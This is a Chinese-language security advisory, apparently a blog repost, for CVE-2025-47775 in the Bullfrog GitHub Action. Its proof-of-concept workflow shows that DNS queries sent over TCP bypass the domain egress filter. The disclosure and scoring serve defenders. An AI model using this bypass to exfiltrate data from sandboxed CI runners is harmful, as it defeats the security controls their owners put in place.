Bullfrog DNS over TCP漏洞绕过域名过滤机制解析

本文详细分析了CVE-2025-47775安全漏洞,该漏洞存在于Bullfrog的DNS over TCP实现中,攻击者可通过TCP协议绕过域名过滤机制进行DNS数据外泄。文章包含漏洞原理、PoC验证代码和修复方案。

CVE-2025-47775:Bullfrog的DNS over TCP绕过域名过滤漏洞

漏洞详情

包信息

  • 包名称: actions
  • 受影响版本: < 0.8.4
  • 已修复版本: 0.8.4

漏洞描述

摘要 使用TCP协议会破坏域名阻断机制,允许DNS数据外泄。

概念验证(PoC)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
name: test
on:
  push:
    branches:
      - "*"

jobs:
  testBullFrog:
    runs-on: ubuntu-22.04
    steps:
      - name: Use google dns
        run: |
          sudo resolvectl dns eth0 1.1.1.1
          resolvectl status
      - name: Set up bullfrog to block everything
        uses: bullfrogsec/bullfrog@1472c28724ef13ea0adc54d0a42c2853d42786b1 # v0.8.2
        with:
           egress-policy: block
           allowed-domains: |
             *.github.com
      - name: Test connectivity
        run: |
          echo testing udp allowed ..
          dig api.github.com @1.1.1.1 || :
          echo testing tcp allowed ..
          dig api.github.com @1.1.1.1 +tcp || :

          echo testing udp not allowed
          dig api.google.com @1.1.1.1 || :
          echo testing tcp not allowed
          dig api.google.com @1.1.1.1 +tcp || :

影响

沙箱绕过

参考链接

安全评分

严重程度

中等

CVSS总体评分

6.2/10

CVSS v3基础指标

  • 攻击向量: 本地(L)
  • 攻击复杂度: 低(L)
  • 所需权限: 无(N)
  • 用户交互: 无(N)
  • 范围: 未改变(U)
  • 机密性: 高(H)
  • 完整性: 无(N)
  • 可用性: 无(N)

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

EPSS评分

0.051%(第16百分位)

弱点分类

CWE-201: 在发送的数据中插入敏感信息

代码将数据传输给另一个参与者,但部分数据包含不应被该参与者访问的敏感信息。

标识符

  • CVE ID: CVE-2025-47775
  • GHSA ID: GHSA-m32f-fjw2-37v3

源代码

bullfrogsec/bullfrog

致谢

报告者: vin01

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计